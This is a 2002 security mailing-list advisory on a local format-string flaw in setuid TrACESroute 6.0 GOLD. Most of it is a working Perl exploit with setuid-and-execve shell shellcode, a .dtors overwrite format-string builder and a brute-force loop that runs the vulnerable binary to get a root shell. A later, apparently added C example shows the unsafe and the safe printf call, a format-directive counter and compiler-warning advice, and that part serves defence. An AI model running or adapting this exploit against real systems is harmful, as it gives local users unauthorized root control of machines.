[EXPL] TrACESroute GOLD Local Format String Exploit

From: support@securiteam.com
Date: 06/18/02


From: support@securiteam.com
To: list@securiteam.com
Date: Tue, 18 Jun 2002 08:11:26 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  TrACESroute GOLD Local Format String Exploit
------------------------------------------------------------------------

SUMMARY

TrACESroute is just another traceroute program. It uses raw sockets, so it
must be executed with elevated privileges, and for that reason the
traceroute binary is usually installed with the setuid bit. A security
vulnerability in the product allows a local user to gain root privileges.
The following exploit code can be used to test your system for the
mentioned vulnerability.

DETAILS

Exploit:
#!/usr/bin/perl

## ---/ tracesex.pl /---------------------------------------------------
##
## TrACESroute 6.0 GOLD local format string exploit
## * tested on Red Hat Linux release 7.2 (Enigma)
## * Jun 12 2002
##
## Author: stringz // thc@drug.org
## Vulnerability discovered by: downbload // downbload@hotmail.com
##
## Developed on the Snosoft Cerebrum test bed. - http://www.snosoft.com
##
## Greets: g463, syphix, S (super), KF, vacuum, dageshi, sozni,
## obscure, jove, rachel, kevin, and all of my 2e2h friends.
##
## ---/ powered by pot /-----------------------------------------------

# setuid + execve shellcode
$kode =
  "\x31\xdb". # xor ebx, ebx
  "\xf7\xe3". # mul ebx
  "\xb0\x17". # mov al, 0x17
  "\xcd\x80". # int 0x80
  "\x31\xc0". # xor eax, eax
  "\x99". # cdq
  "\x52". # push edx
  "\x68\x2f\x2f\x73\x68". # push dword 0x68732f2f
  "\x68\x2f\x62\x69\x6e". # push dword 0x6e69622f
  "\x89\xe3". # mov ebx, esp
  "\x52". # push edx
  "\x53". # push ebx
  "\x89\xe1". # mov ecx, esp
  "\xb0\x0b". # mov al, 0x0b
  "\xcd\x80"; # int 0x80

$vuln = "./tr"; # CHANGE THIS!@#$%!
$dtors = 0x804e48c + 4;

printf("\n-- TrACESroute 6.0 GOLD local format string exploit\n");
printf("-- Author: stringz // thc\@drug.org\n\n");
printf("-- Vulnerability discovered by: downbload // downbload\@hotmail.com\n");

$ret_addr = 0xc0000000 - 4
    - (length($vuln) + 1)
    - (length($kode) + 1)
    ;

undef(%ENV); $ENV{'1337'} = $kode;

printf("overwriting %#.08x with %#.08x\n", $dtors, $ret_addr);
printf("bruteforcing distance (1 .. 300)\n");
sleep(2);

for (1 .. 300) {
    $fmt_str = sw_fmtstr_create($dtors, $ret_addr, $_);
    die("\x0a") if (system("$vuln -T $fmt_str localhost"))
        =~ m/^(0|256|512|32512)$/; # may need a tweak ;)
}

sub
sw_fmtstr_create ($$$)
{
    die("Incorrect number of arguments for sw_fmtstr_create")
        unless @_ == 3;

    my ($dest_addr, $ret_addr, $dist) = @_;
    my ($word, $qword) = (2, 8);

    # $dest_addr = where to write $ret_addr
    # $ret_addr = where to return execution
    # $dist = the calculated distance

    $tmp1 = (($ret_addr >> 16) & 0xffff);
    $tmp2 = $ret_addr & 0xffff;

    if ($tmp1 < $tmp2) {
        $high = $tmp1 - $qword;
        $low = $tmp2 - $high - $qword;

        $dest_addr1 = pack('L', $dest_addr + $word);
        $dest_addr2 = pack('L', $dest_addr);
    }
    else {
        $high = $tmp2 - $qword;
        $low = $tmp1 - $high - $qword;

        $dest_addr1 = pack('L', $dest_addr);
        $dest_addr2 = pack('L', $dest_addr + $word);
    }

    sprintf("%.4s%.4s%%%uu%%%u\$hn%%%uu%%%u\$hn",
            $dest_addr1, $dest_addr2, $high, $dist,
            $low, $dist + 1);
}
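The defect class behind this advisory, seen from the defender's side, as an added example that is not TrACESroute's source and not part of the original advisory (describe_target_unsafe, describe_target_safe and count_format_directives are hypothetical names): a caller-supplied option value must be passed to a printf-family function as a "%s" argument, never as the format itself, and an audit helper can count how many conversions such a value would trigger if misused.

```c
#include <stdio.h>
#include <string.h>
/* Added illustration of the defect class in this advisory; NOT TrACESroute's
 * source, and the function names are hypothetical. A caller-supplied string
 * (think of the -T value) is either the printf FORMAT or a "%s" ARGUMENT. */

/* Unsafe: directives inside 'target' ("%u", "%hn", positional "%7$hn") are
 * interpreted. gcc/clang report exactly this with -Wformat-security; the
 * pragma silences it here only so the demonstration builds under -Werror. */
#pragma GCC diagnostic ignored "-Wformat-security"
#pragma GCC diagnostic ignored "-Wformat-nonliteral"
static int describe_target_unsafe(char *out, size_t n, const char *target)
{
    return snprintf(out, n, target);
}

/* Hardened: the same string is copied verbatim; its '%' bytes are inert. */
static int describe_target_safe(char *out, size_t n, const char *target)
{
    return snprintf(out, n, "%s", target);
}

/* Audit helper: count the conversions an untrusted string would trigger if
 * misused as a format ("%%" is a literal percent and is not counted). */
static int count_format_directives(const char *s)
{
    int count = 0;
    for (; *s != '\0'; s++) {
        if (*s != '%') continue;
        if (s[1] == '%') {  /* escaped percent: skip the pair */
            s++;
            continue;
        }
        count++;
    }
    return count;
}

int main(void)
{
    /* constructed inputs: a hostname and the shape of the -T payload above */
    const char *benign = "localhost", *hostile = "%123u%7$hn%456u%8$hn";
    char buf[64];
    describe_target_unsafe(buf, sizeof buf, benign);  /* benign input only */
    describe_target_safe(buf, sizeof buf, hostile);
    printf("safe path copied \"%s\"; directives: benign=%d hostile=%d\n", buf,
           count_format_directives(benign), count_format_directives(hostile));
    return 0;
}
```

Built with -Wformat-security (or -Wformat=2) and without the pragma, the compiler reports describe_target_unsafe at build time, which is the cheapest check for this bug class in any setuid program.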

ADDITIONAL INFORMATION

The information has been provided by thc (thc@drug.org).
